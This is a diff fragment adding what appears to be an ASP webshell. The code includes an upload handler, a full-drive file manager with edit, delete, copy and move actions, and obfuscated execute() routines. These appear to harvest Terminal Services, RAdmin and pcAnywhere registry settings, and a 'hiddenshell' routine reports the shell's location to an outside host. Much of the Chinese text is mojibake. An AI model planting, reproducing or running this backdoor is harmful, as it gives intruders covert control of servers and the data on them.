+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function Show1File(Path) 
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>" 
+For Each F in FOLD.subfolders
+SI=SI&"<td  height=10 width=17% align=center><div  onMouseOver=""this.style.backgroundColor='#B3D169'"" onMouseOut=""this.style.backgroundColor='#191919'"" style='border:1px solid #dddddd;padding-bottom:4px' id=d><a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����"">"
+SI=SI&"&nbsp;<font face='wingdings' color='#ffffff' size='6'>0</font>  "
+si=si&"<br>"&F.Name&"</a><br><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()' class='am' title='�ƶ�'>Move</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()' class='am' title='����'>Down</a></div></td>"
+i=i+1
+If i mod 6=0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr>"
+j SI &"" : SI="":i=0
+SI="<div id=links><table width='100%' align=center id =linklist2><tr><td id=s><b id=x>Filename</b></td><td id=s height=22><b id=x>Size</b></td><td id=s><b id=x>Type</b></td><td id=s><b id=x>Operating</b></td><td id=s><b id=x>Last Modified</b></td><td></td>"
+For Each L in Fold.files
+SI=SI&"<tr><td height='20' id=d >"
+si=si&"<font face='wingdings' color='#FF6600' size='3'>2</font>"
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'>  "&L.Name&"</a><Td id=d>"&clng(L.size/1024)&"K</td><Td id=d>"&L.Type&"</td><Td id=d>"
+si=si&"<a href="""&openUrl(PaTh&"\"&L.nAme)&""" class='am' title='Open'>Open</a> "
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+Si=Si&"<a onclick=""window.open('?Action=EditPower&PowerPath="&RepAth(PaTh&"\"&L.nAme)&"','EditPower','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=300,height=200')"" href='###' class='am' title='Ȩ��'><font  color='#33FF00' >Ȩ��</font></a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"��"
+end if
+si=si&" <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></td><td id=d>"&replace(L.DateLastModified,"/","-")&"</td></tr>"
+i=i+1
+Next
+j SI&"</tr></table></div><script>var container = new Array(""linklist2""); var objects = new Array(); var links = new Array(); var tmp = new Array(); var interval = 0; var c=0; function initEventListener() { for(i=0; i < container.length; i++) { objects = document.getElementById(container[i]).getElementsByTagName(""td""); for(j=0; j < objects.length; j++) {    if(document.all) { objects[j].attachEvent(""onmouseover"", resetLinkFade); objects[j].attachEvent(""onmouseout"", startLinkFade); } else {objects[j].addEventListener(""mouseover"", resetLinkFade, false); objects[j].addEventListener(""mouseout"", startLinkFade, false); } var defcol = getPseudoRule(container[i], ""td"");  var hovcol = getPseudoRule(container[i], ""td:hover""); if(defcol.charAt(0) == ""#"") defcol = hex2rgb(defcol); else if(defcol[0] == ""r"") { defcol = defcol.match(/rgb\((\d+), (\d+), (\d+)\)/); defcol = defcol.slice(1);} if(hovcol.charAt(0) == ""#"") hovcol = hex2rgb(hovcol); else if(hovcol[0] == ""r""){ hovcol = hovcol.match(/rgb\((\d+), (\d+), (\d+)\)/); hovcol = hovcol.slice(1); } links[c]     = new Array(); links[c][""object""]  = objects[j]; links[c][""defaultcolor""] = defcol; links[c][""currentcolor""] = defcol; links[c][""hovercolor""] = hovcol; c++; } } } function resetLinkFade(e) { var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { tmp = links[r][""defaultcolor""].clone(); links[r][""currentcolor""] = links[r][""defaultcolor""]; links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } }function startLinkFade(e) {   var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { links[r][""defaultcolor""] = tmp.clone(); links[r][""currentcolor""] = links[r][""hovercolor""].clone(); links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } if(interval == 0) interval = window.setInterval(linkFade,  30); } function linkFade() {  var runners = 0; for(o=0; o<links.length; o++) { var aim  = links[o][""object""]; var defcol = links[o][""defaultcolor""]; var hovcol = links[o][""hovercolor""]; var actcol = links[o][""currentcolor""]; if( defcol[0]+defcol[1]+defcol[2] != actcol[0]+actcol[1]+actcol[2] ) { runners++; actcol[0] = actcol[0]-10 < 25 ? 25 : actcol[0]-10; actcol[1] = actcol[1]-10 < 25 ? 25 : actcol[1]-10; actcol[2] = actcol[2]-10 < 25 ? 25 : actcol[2]-10; aim.style.backgroundColor = rgb2hex(actcol); links[o][""currentcolor""] = actcol; } } if(runners == 0) { window.clearInterval(interval); interval=0; } } function getPseudoRule(parent, element) {  var mysheet =document.styleSheets[0]; var myrule  = mysheet.cssRules || mysheet.rules; for (n = 0; n < myrule.length; n++) if (myrule[n].selectorText.toLowerCase() == ""#""+ parent +"" ""+ element) return myrule[n].style.backgroundColor; else if (myrule[n].selectorText.toLowerCase() == element) return myrule[n].style.backgroundColor; return """"; } function hex2rgb(hex) { var triplet = hex.toLowerCase().replace(/#/, ''); var rgbArr  = new Array();  if(triplet.length == 6) { rgbArr[0] = parseInt(triplet.substr(0,2), 16) ;rgbArr[1] = parseInt(triplet.substr(2,2), 16) ;rgbArr[2] = parseInt(triplet.substr(4,2), 16) ;return rgbArr; } else if(triplet.length == 3){rgbArr[0] = parseInt((triplet.substr(0,1) + triplet.substr(0,1)), 16); rgbArr[1] = parseInt((triplet.substr(1,1) + triplet.substr(1,1)), 16); rgbArr[2] = parseInt((triplet.substr(2,2) + triplet.substr(2,2)), 16); return rgbArr; } else { throw triplet + ' is not a valid color triplet.'; } } function rgb2hex(rgb) { var hexcolors = new Array(""0"",""1"",""2"",""3"",""4"",""5"",""6"",""7"",""8"",""9"",""a"",""b"",""c"",""d"",""e"",""f""); var r, r1, r2, g, g1, g2, b, b1, b2; r1 = Math.floor(rgb[0] / 16); r2 = rgb[0] - r1*16; g1 = Math.floor(rgb[1] / 16); g2 = rgb[1] - g1*16; b1 = Math.floor(rgb[2] / 16); b2 = rgb[2] - b1*16; r = hexcolors[r1] + hexcolors[r2]; g = hexcolors[g1] + hexcolors[g2]; b = hexcolors[b1] + hexcolors[b2]; return ""#""+r+g+b; } Object.prototype.clone = function(deep) { var objectClone = new this.constructor(); for (var property in this) if (!deep) objectClone[property] = this[property]; else if (typeof this[property] == 'object') objectClone[property] = this[property].clone(deep); else {objectClone[property] = this[property]; }return objectClone; } "&VBNEWLINE
+if ysjb=true then j "initEventListener();</script>":end if
+Set FOLD=Nothing
+End function
+Function DelFile(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɳ�ɾ `&izqY&` ������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY tsoXtztstW.XZ��ftiJ )izqY(lzlobStsoX.XZ yC"))
+End Function
+Function EditFile(Path)
+If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>��ϲ���ļ�����ɹ���</center>":SI=SI&BackUrl:j SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\shell.asp":Txt=strBAD:End If:j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input name='Action' value='EditFile' Type='hidden'><input name='FName' value='"&Path&"' style='width:100%'><br><textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br><hr><input name='goback' type='button' value='Back' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='Reset'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='Save'></form>"
+End Function
+Function CopyFile(Path)
+execute(king("yC rfS�� CU p��skMaeqA&CU=CU��`>ktzfte/<�������Ƹ�`&)1(izqY&`������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY tsoXnhgZ.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function MoveFile(Path)
+execute(king("yC rfS�� CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɶ���`&)1(izqY&`������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY tsoXtcgT.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function DelFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɳ�ɾ`&izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY ktrsgXtztstW.XZ��ftiJ )izqY(lzlobSktrsgX.XZ yC"))
+End Function
+Function CopyFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�������Ƹ�`&)1(izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY ktrsgXnhgZ.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function MoveFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɶ���`&)1(izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY ktrsgXtcgT.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function NewFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɽ���`&izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY ktrsgXtzqtkZ.XZ��ftiJ ``><izqY rfq )izqY(lzlobSktrsgX.XZ zgG yC"))
+End Function
+End Class
+
+sub getTerminalInfo()
+execute(king("yo rfS��`����tktivnfQeh���ý��Ʋ�����¼Ŀ��Ĭ���Կ�,��������tktivnfQeh_�ַ�>os<`p��ftiJ )`yoe.`&tdqfktcktl&`\etzfqdnU\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfQ lzftdxegW\`&ktcokrlnl(lzlobStsoX.gly yC��)`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`(rqtNutN.ilv=tdqfktcktl��)9,)9(ktrsgXsqoethlztE.glX(zyts=tcokrlnU��)BUX_JUGBZ(zetpwgtzqtkZ.ktcktU=gly ztU��zbtG��yo rfS��yo rfS��`>kw<��ľYDY��д�Ҳ�,¼ĿsoqTwtK�Ҳ��Կ�,������ȨdtzlnUsqegV����,soqdfoK eouqT_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ )`soqdfov`,)tdqG.teocktUpwg(tlqes(kzlfo yo��yo rfS��yo rfS��`>kw<Ȩ����ľhlR��ʹ�ǿ��Կ�,������ȨdtzlnUsqegV����,zqedgJ_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ )`zqedgz`,)tdqG.teocktUpwg(tlqes(kzlfo yo��yo rfS��yo rft��yo rfS��`>kw<��ľYDY�ǿ��Կ�,dtzlnUsqegVΪ��Ȩ����,�ڴ����tieqhQ_���������>os< `p��tlsS��`>kw<Ȩ���ֱ�Կ�.tieqhQΪ�����ASKǰ��>os<`p��ftiJ )`tieqhQ`,)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN(kzlfo yC��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ `tieqhq`=)tdqG.teocktUpwg(tlqes yo��yo rfS��yo rfS��`>kw<Ȩ��߹�tbt.xl���ǿ��Կ�,������ȨdtzlnUsqegV����,װ��M-cktU_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ `M-cktU`=tdqG.teocktUpwg yo��ktzxhdgZpwg fC teocktUpwg ieqS kgX��zbtG tdxltN kgkkS fB��)`teocktU`(nqkkQ = ktzsoX.ktzxhdgZpwg��)`fgozqeoshhQ.sstiU`(zetpwBtzqtkZ.ktcktU = ql ztU��)`.//:JGfoK`(zetpwBztE = ktzxhdgZpwg ztU��`>ki<>kw<]��̽��_�������[`p��`>kw<>kw<>kw<------------------------------------`p��`>kw<`&aa&`:Ϊ����_����ǰ��>os<`p��)ai(rqtNutN.ilv=aa��`zfxgZ\dxfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ai��`>kw<`&sdzf&`:Ϊ����sdzG ztfstJ>os<`p��0=sdzG ftiJ ``=sdzf yo��)ntaVTJG(rqtNutN.ilK=sdzf��`VTJG\1.0\ktcktUztfstJ\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaVTJG��`>kw<`&nshlor&`:������Ǵ�_��ʾ�Է���>os<`p��`��`=nshlor tlst `��`=nshlor ftiJ 1=fougshlor kg ``=fougshlor yC��)`tdqGktlMzlqVnqshloWzfgW\dtzlnU\ltoeosgY\fgolktIzftkkxZ\lvgrfoK\zyglgkeoT\tkqvzygU\SGCDZQT_VQZBV_OSFD`(rqtNutk.ilv=fougshlor��yo rfS��`>zfgy/<>kw<`&rvllqY&`:����>rtk=kgsge zfgy<>tkqxjl=thnz os<`p��`>kw<`&fodrQ&`:������>tkqxjl=thnz os<`p��)`rkgvllqYzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=rvllqY��)`tdqGktlMzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=fodrQ��`>kw<����:��Ƕ�_�Ի���>os<`p��tlsS��`>kw<����δ:��Ƕ�_�Ի���>os<`p��ftiJ ``=fougsgzxQ kg 1=fougsgzxQ yo��)fougsgzxQlo(rqtNutN.ilK=fougsgzxQ��`fgugVfodrQgzxQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=fougsgzxQlo��`>zfgy/<>kw<`&tdqGfodrQ&`>rtk=kgsge zfgy<:Ϊ������Ա`&`������Ĭ>os<`p����yo rft��`akgvztG.zhokelK:���в���������`p��ftiz kkt yo��zbtG��`>os/<>zfgy/<>kw<`&tdqG.fodrq&`����Ա����ǰ��>rtk=kgsge zfgy<>os<` p��lktwdtT.hxgkEpwg fo fodrq ieqS kgX��)`hxgku,lkgzqkzlofodrQ/`&tdqGktzxhdgZ.Gz&`//:JGfoK`(zetpwBztE=hxgkEpwg ztU��)`akgvztG.zhokelK`(zetpwBtzqtke.ktcktl=Gz ztU�� zbtf tdxltk kgkkt fg��1=ltkohbS.tlfghltN��`kgzqkzlofodrQ`=tdqGfodrQ ftiJ ``=tdqffodrq yo��)ntFtdqGfodrQ(rqtNutN.ilv=tdqGfodrQ��`tdqGktlMzsxqytWzsQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtdqGfodrQ��`>kw<`&tdqfeh&`:Ϊ����_��ǰ��>os<`p��`>kw<.������ȡ_������`=tdqfeh ftiJ ``=tdqfeh yo��)ntatdqfeh(rqtNutN.ilv=tdqfeh��`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`=ntatdqfeh��`>0=tmol ki<>kw<]��̽_����ͳϵ[>kw<>kw<`p��zbtf��`>kw<`&)o(lizqh&`>os<`p��)lizqh(rfxgwM gz )lizqh(rfxgwV=o kgX��`>kw<:���侶·_ǰ��ͳϵ`p��`>kw<------------------------------------`p��)`;`,izqYzygU(zoshl=lizqh��`>kw<��֧:_������ɱ��ϵ����>os<`p ftiJ )`ufolok`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱ��������>os<`p ftiJ )`lxkocozfq`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱ��ϵɽ�� >os<`p ftiJ )`cqa`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱssoF>os<`p ftiJ )`ssoF`,gyfoizqY(kzlfo yo��`>kw<��֧:_�ƿ�tktivnfQeY��������>os<`p ftiJ )`tktivnfqeh`,gyfoizqY(kzlfo yo��`>kw<��֧:_�����TXZ>os<`p ftiJ )`4bdfgolxye`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������tseqkB>os<`p ftiJ )`tseqkg`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������VHUnT>os<`p ftiJ )`sjlnd`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������VHUUT>os<`p ftiJ )`ktcktl sjl zyglgkeod`,gyfoizqY(kzlfo yo��`>kw<��֧:_����qcqR>os<`p ftiJ )`qcqp`,gyfoizqY(kzlfo yo��`>kw<��֧:_����sktY>os<`p ftiJ )`skth`,gyfoizqY(kzlfC yo��`:��֧��`&`��ͳϵ`p��)izqYzygU(tlqes=gyfoizqY��)`izqY`(dtzo.zftdfgkocfS.ilK=izqYzygU��`>0=tmol ki<>kw<]��̽��_��ͳϵ[>kw<>kw<>kw<`p��`>sg/<`p��yC rfS��`>kw<` & rkgvllqYfougVgzxq & ` :���ܻ��ʵ�`&`¼�Ƕ���`p��yC rfS��`tlsqX`p��kqtsZ.kkS��ftiJ kkS yC��)ntFllqYfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = rkgvllqYfougVgzxq��`>kw<` & tdqfktlMfougVgzxq & ` :����ͳϵ��`&`¼�Ƕ���`p��)ntFktlMfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tdqfktlMfougVgzxq��tlsS��ftiJ 1 = tswqfSfougVgzxQlo yC��)ntFtswqfSfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tswqfSfougVgzxQlo��`rkgvllqYzsxqytW` = ntFllqYfougVgzxq��`tdqGktlMzsxqytW` = ntFktlMfougVgzxq��`fgugVfodrQgzxQ` = ntFtswqfSfougVgzxq��`\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD` = izqYfougVgzxq��yC rfS��`>/kw<` & zkgYdktz & ` :�ڶ�`&`�������ǰ��`p��tlsS ��`>/kw<.���޵��ܷ�����Ȩ��� ,�ڶ˶��յ��÷���`p�� ftiJ 1 >< ktwdxG.kkS kB `` = zkgYdktz yC��`>sg<¼�Ƕ��Լ�`&`�ڶ����_����`p��)ntFzkgYsqfodktz & izqYzkgYsqfodktz(rqtNutN.Llv = zkgYdktz��`ktwdxGzkgY` = ntFzkgYsqfodktz��`\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD` = izqYzkgYsqfodktz��rkgvllqYfougVgzxq ,tdqfktlMfougVgzxq ,ntFtswqfSfougVgzxq ,tswqfSfougVgzxQlo doW��ntFllqYfougVgzxq ,ntFktlMfougVgzxq ,izqYfougVgzxq doW��zkgYdktz ,ntFzkgYsqfodktz ,izqYzkgYsqfodktz doW��)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztU��`------------------------------------------------------`p��`>kw<`&zkgYKQY&`:Ϊ�ڶ�tktivnfQeY>os<`p��`tktivnfQehװ����`&`�ǻ���`&`��ȷ��.ȡ��`&`����`=zkgYKQY ftiz ``=zkgYKQY yC��)ntFtktivnfQeh(rqtNutN.ilK=zkgYKQY��`zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtktivnfQeh��`>zfgy/<>kw<`&zkgYdktJ&`>rtk=kgsge zfgy<:Ϊ�ڶ�teocktU sqfodktJ>os<`p��`��������ktcktU lvgrfoKΪ����`&`��ȷ��.ȡ��`&`����`=zkgYdktJ ftiJ ``=zkgYdktJ yC��)ntFdktJ(rqtNutN.ilK=zkgYdktJ��`ktwdxGzkgY\hez\lrJ\rvhrk\lrK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=ntFdktJ��`>kw<`&zkghzfsJ&`:��`&`��ztfstJ>os<`p��`)����`&`��Ĭ(89`=zfsJ ftiJ ``=zkgYzfsJ yo��)ntFztfstJ(rqtNutN.ilK=zkgYzfsJ��`zkgYztfstJ\1.0\ktcktUztfstJ\zyglgkeoT \SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaztfstJ��`>0=tmol ki<>kw<]��̽`&`�ڶ�`&`����[>kw<>kw<`p��yo rft��zbtG��`>kw<------------------------------------------------`p��yo rfS��yo rfS��`>kw<`p��zbtf��`,`&)p(vgssqYWM p��)vgssqhrx(rfxgAM gJ )vgssqhrx(rfxgAV = p kgy��`:Ϊ�ڶ�hrx��`&`����>os<`p��tlsS��`>kw<��ȫ:Ϊ�ڶ�hrx��`&`����>os<`p��ftiJ 1=)1(vgssqhrx kg ``=)1(vgssqhrx yC��)YWMssxX(rqtNutN.ilK=vgssqhrx��yo rfS��`>kA<`p��zbtG��`,`&)p(vgssqhez p��)vgssqhez(rfxgAM gJ )vgssqhez(rfxgAV = p kgX��`:Ϊ�ڶ�hez��`&`����>os<`p��tlsS��`>kw<��ȫ:Ϊ�ڶ�hez��`&`����>os<`p��ftiJ 1=)1(vgssqhez kg ``=)1(vgssqhez yC��)YZJssxX(rqtNutN.ilK=vgssqhez��FMS&ArhQ&izqh=YWMssxX��FJS&ArhQ&izqY=YZJssxX��`lzkgYrtvgssQYWM\`=FMS��`lzkgYrtvgssQYZJ\`=FJS��tlst��`>kw<ѡɸYC/heJû>os<`p�� ftiJ 0=ktzsoyhohezgG yo��yC rfS��`>kw<������û��ȡ������UGW`&`��Ĭ>os<`p��tlsS��`>kw<`&kzlUGW&`:ΪUGW`&`����>os<`p��ftiJ ``><kzlUGW yC��)ntFUGW(rqtNutN.ilK=kzlUGW��`ktcktUtdqG\`&ArhQ&izqY=ntFUGW��yo rfS��`>kw<������û��ȡ�����޹���>os<`p��tlsS��zbtG��`>kw<`&)p(nqvtzqE&`:`&p&`����>os<`p��)nqvtzqE(rfxgwM gz )nqvtzqE(rfxgwV=p kgX��ftiJ )nqKtzqE(nqkkqlo yC��)ntFnqKtzqE(rqtkutN.ilK=nqKtzqE��`nqvtzqEzsxqytW\`&ArhQ&izqY=ntFnqKtzqE��yo rfS��`>kw<������û��`&`ȡ������ַ`&`��YC>os<`p��tlsS��zbtG��`>kw<`&)p(krrQYC&`:Ϊ`&p&`ַ`&`��YC>os<`p��)krrQYC(rfxgwM gz )krrQYC(rfxgwV=p kgX��ftiJ ``><)1(krrqYC yC��)ntFYC(rqtkutN.ilK=krrqYC��`lltkrrQYC\`&ArhQ&izqY=ntFYC��`\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=izqY��`>kw<`&ArhQ&`:Ϊ�����`&o&`����`p��)``,`\teoctW\`,)o(lrhQ(teqshtN=ArhQ��0-)lrhQ(rfxgAM gJ )lrhQ(rfxgAV=o kgX�� ftiJ )lrhQ(nqkkQlC yC��)ntFrhQ(rqtNutN.ilK=lrhQ��`rfoA\tuqafoV\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ntFrhQ��yC rfS��0=ktzsoyhohezgG��ftiJ ``=tswqfSlo kg 1=tswqfSlo yC��)ntFhoheJtswqfS(rqtkutN.ilK=tswqfSlo��`lktzsoXnzokxetUtswqfS\lktztdqkqY\hoheJ\lteocktU\ztUsgkzfgZzftkkxe\TSJUOU\TVFD`=ntFYCYZJtswqfS��`>0=tmol ki<>kw<]��̽`&`����[`p��)`sstiU.zhokelK`(zetpwgtzqtke=ilv ztl��ilv dor��zbtf tdxltk kgkkt fg"))
+End Sub:sub hiddenshell
+execute(king("`>zhokel/<;'`&skx&)`tdqf_ktcktl`(zltxjtk&`//:hzzi'=fgozqegs.zftkqh>zhokel<` p��ufoizgf=gly ztl��0tdqftsoy&`.`&bthrfk&`\`&0izqhtsoy&`\.\\`,izqhy tsoynhge.gly��0tdqftsoy&`.`&bthrfk&))`/`,skx(ctkkzlfo,skx(zyts=skx��)`skx`(ltswqokqcktcktl.zltxjtk=skx��))`\`,izqhy(ctkkzlfo-)izqhy(fts,izqhy(ziuok=0tdqftsoy��)`.`(izqhhqd.ktcktl=0izqhtsoy��``=)`vpstl`(fgolltl��))40,1(ktwdxfrfk()`|`,bth(zoshl=bthrfk��`2zhs|3zhs|4zhs|5zhs|6zhs|7zhs|8zhs|9zhs|0zhs|2dge|3dge|4dge|5dge|6dge|7dge|8dge|9dge|0dge`=bth��)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl��))`STQG_JYCNZU`(ltswqokqIktcktU.zltxjtN(izqYhqT.ktcktU=izqhy"))
+end sub
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject(CONST_FSO)
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
